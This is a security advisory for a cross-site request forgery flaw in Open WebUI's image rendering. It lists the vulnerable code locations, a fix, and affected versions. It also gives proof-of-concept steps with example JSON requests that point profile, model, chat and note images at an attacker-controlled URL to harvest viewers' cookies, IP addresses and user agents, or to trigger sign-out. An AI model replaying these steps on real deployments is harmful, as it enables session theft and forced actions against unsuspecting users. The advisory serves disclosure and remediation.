GHSA-j6w6-986j-2m2m

Source

https://github.com/advisories/GHSA-j6w6-986j-2m2m

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-j6w6-986j-2m2m/GHSA-j6w6-986j-2m2m.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-j6w6-986j-2m2m

Aliases

CVE-2026-45317

Published

2026-05-14T20:18:42Z

Modified

2026-05-19T16:15:13.936993110Z

Severity

4.6 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L CVSS Calculator

Summary

Open WebUI Vulnerable to Cross-Site Request Forgery (CSRF) via Image URL Manipulation

Details

Summary

An application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions.

This can be exploited in various locations, including:

• Profile picture

• Model picture

• Hidden images in shared chats

• Images within shared notes

Details

Vulnerable Code:

This appears to occur in most locations where images can be uploaded/rendered. Here are found sinks:

Profile Image in chat

• Note: rendering profile picture in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ProfileImage.svelte#L16Code

Profile Picture edit

• Note: Profile picture rendering in edit

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Settings/Account.svelte#L205

Profile Image Navbar

• Note: Profile picture rendering in navbar

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Navbar.svelte#L237

Profile Image UserList

• Note: rendering images in user list admin panel

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Users/UserList.svelte#L399

Images in chat

• Note: rendering images in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/Image.svelte#L35

Image in chat

• Note: Image sent in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/channel/Messages/Message.svelte#L192 Model image in chat

• Note: Model image rendering in chat

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Placeholder.svelte#L128

Model image in chat response

• Note: Model image rendering in the assistant response

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/ResponseMessage.svelte#L612

Model Image Admin settings

• Note: Model image rendering in the admin settings

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/admin/Settings/Models.svelte#L336

Model Image Workspace

• Note: Model image rendering in the workspace

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models.svelte#L336

Model Image Edit

• Note: Model image rendering in the edit modal

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/workspace/Models/ModelEditor.svelte#L407

Image in Notes

• Note: Image rendering in shared note

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/common/RichTextInput/Image/image.ts#L140

• Location: https://github.com/open-webui/open-webui/blob/2407d9b905978d68619bdce4021e424046ec8df9/src/lib/components/chat/Messages/UserMessage.svelte#L184

Root Cause

Insecure display of image

• Application is sending a GET request to the unvalidated image url

Lack of Input Validation

• Image url is not validated for filetype

PoCs

PoC (profile picture)

Environment

• Open-WebUl latest version (v0.6.41)

• Valid user

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, user-agent, etc

Step 2: Profile Image URL

Add user
Change the profile image url parameter to the malicious URL (server was used for PoC)
Example POST request:

Repeat action
1. Repeat for userSignUp, updateUserProfile, and update

Step 3: View Image on Victim Admin Account

Log into an admin account
Visit the admin panel (/admin/users/overview)
Notice the GET request sent to the malicious URL

Step 4: Verify User Information Is Sent

Confirm user information is sent

PoC (chat)

Environment

• Open-WebUl latest version (v0.6.41)

• Valid user

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc

Step 2: Start chat

Start chat
Send a message
Resend POST request
Resend post request to this endpoint /api/v1/chats/[chatidhere]
Add in a file with type set to image and the url set to the malicious link
Replace models/ids/maliciousurlhere with what is applicable
{"chat":{"models":["redacted"],"history":{"messages":{"idhere":{"id":"idhere","parentId":"idhere","childrenIds":["idhere"],"role":"user","content":"","files":[{"type":"image","url":"MALICIOUSURLHERE"}],"timestamp":1765978991,"models":["redacted"]}}},"params":{},"files":[]}}

Share chat
1. Copy link to share the chat

Step 3: View Image on Victim Account

Log into a valid account
Open the shared chat
Notice the GET request sent to the malicious URL from the hidden image on the page

Step 4: Verify User Information Is Sent

Confirm user information is sent

PoC (notes)

Environment

• Open WebUI latest version (v0.6.41)

• Valid user with access to notes

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc

Step 2: Create Note

Resend POST request to /api/v1/notes/[noteidhere]/update
Add in the malicious URL to a file
Example parameters

1. (replace the IDHERE with valid ID and MALICIOUSURL_HERE with the malicious URL):
1. {"title":"2025-12-17","data":{"files":[{"id":"ID_HERE","type":"image","url":"MALICIOUS_URL_HERE"}]},"access_control":{"read":{"group_ids":[],"user_ids":[]},"write":{"group_ids":[],"user_ids":[]}}}

Refresh page and notice the request being sent to the malicious URL
Share note and copy link

Step 5: View Note on Valid Account

Log into a valid account
Open the shared note
Notice the GET request sent to the malicious URL from the hidden image on the page

Step 6: Verify User Information Is Sent

Verify that user information is sent.

PoC (model)

Environment

• Open WebUI latest version (v0.6.41)

• Admin user

Step 1: Create a Malicious Link

• Set up a server to obtain victim's cookies, ip, referer, use-agent, etc

Step 2: Create Model

Navigate to /workspace/models
Create or edit a model
Send a POST request to /api/v1/models/create or /api/v1/models/model/update?id=[model_id]
Change the profileimageurl to the malicious link
Example parameters:
{"id":"model_test","base_model_id":"redacted","name":"MODEL_TEST","meta":{"profile_image_url":"MALICIOUS_URL_HERE","description":null,"suggestion_prompts":null,"tags":[],"capabilities":{"vision":true,"file_upload":true,"web_search":true,"image_generation":true,"code_interpreter":true,"citations":true,"usage":false}},"params":{},"access_control":null} <img width="887" height="618" alt="image" src="https://github.com/user-attachments/assets/749dac39-0b9d-4b7e-815d-fd6f3f7c57bd" />

Step 3: View Image on Valid Account

Log into a valid account
Create chat with the model
Notice a GET request is sent to the malicious url
All users starting a chat with that model will be vulnerable to the attack

Step 4: View Image on Admin Account

Navigate to /workspace/models
Notice GET request sent to malicious url

Step 5: Verify User Information Is Sent

On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.

Other Attack Examples

Alternative malicious links
Signout of Open WebUI
- /api/v1/auths/signout
Internal network endpoints
Signout of other applications
Resource intensive endpoints
Etc

Recommended Fix

Store images
- Instead of sending a GET request to load the image each time, store the image and render on the page
Validate input
- Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)

Impact

Vulnerability Type

CWE-352: Cross-Site Request Forgery (CSRF)
CWE-20: Improper Input Validation

Affected users

All authenticated users

The impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.

Database specific

{
    "severity": "MODERATE",
    "nvd_published_at": "2026-05-15T22:16:54Z",
    "cwe_ids": [
        "CWE-20",
        "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:18:42Z"
}

References

Affected packages

PyPI / open-webui

Package

Name: open-webui; View open source insights on deps.dev
Purl: pkg:pypi/open-webui

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.9.3

Affected versions

0.*

0.1.124

0.1.125

0.2.0

0.2.1

0.2.2

0.2.3

0.2.4

0.2.5

0.3.0

0.3.1

0.3.2

0.3.3

0.3.4

0.3.5

0.3.6

0.3.7

0.3.8

0.3.9

0.3.10

0.3.12

0.3.13

0.3.14

0.3.15

0.3.16

0.3.17.dev2

0.3.17.dev3

0.3.17.dev4

0.3.17.dev5

0.3.17

0.3.18

0.3.19

0.3.20

0.3.21

0.3.22

0.3.23

0.3.24

0.3.25

0.3.26

0.3.27.dev1

0.3.27.dev2

0.3.27.dev3

0.3.27

0.3.28

0.3.29

0.3.30.dev1

0.3.30.dev2

0.3.30

0.3.31.dev1

0.3.31

0.3.32

0.3.33.dev1

0.3.33

0.3.34

0.3.35

0.4.0.dev1

0.4.0.dev2

0.4.0

0.4.1

0.4.2

0.4.3

0.4.4

0.4.5

0.4.6.dev1

0.4.6

0.4.7

0.4.8

0.5.0.dev1

0.5.0.dev2

0.5.0

0.5.1

0.5.2

0.5.3.dev1

0.5.3

0.5.4

0.5.5

0.5.6

0.5.7

0.5.8

0.5.9

0.5.10

0.5.11

0.5.12

0.5.13

0.5.14

0.5.15

0.5.16

0.5.17

0.5.18

0.5.19

0.5.20

0.6.0

0.6.1

0.6.2

0.6.3

0.6.4

0.6.5

0.6.6.dev1

0.6.6

0.6.7

0.6.8

0.6.9

0.6.10

0.6.11

0.6.12

0.6.13

0.6.14

0.6.15

0.6.16

0.6.18

0.6.19

0.6.20

0.6.21

0.6.22

0.6.23

0.6.24

0.6.25

0.6.26.dev1

0.6.26

0.6.27

0.6.28

0.6.29

0.6.30

0.6.31

0.6.32

0.6.33

0.6.34

0.6.35

0.6.36

0.6.37

0.6.38

0.6.39

0.6.40

0.6.41

0.6.42

0.6.43

0.7.0

0.7.1

0.7.2

0.8.0

0.8.1

0.8.2

0.8.3

0.8.4

0.8.5

0.8.6

0.8.7

0.8.8

0.8.9

0.8.10

0.8.11

0.8.12

0.9.0

0.9.1

0.9.2

Database specific

last_known_affected_version_range

"<= 0.9.2"

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-j6w6-986j-2m2m/GHSA-j6w6-986j-2m2m.json"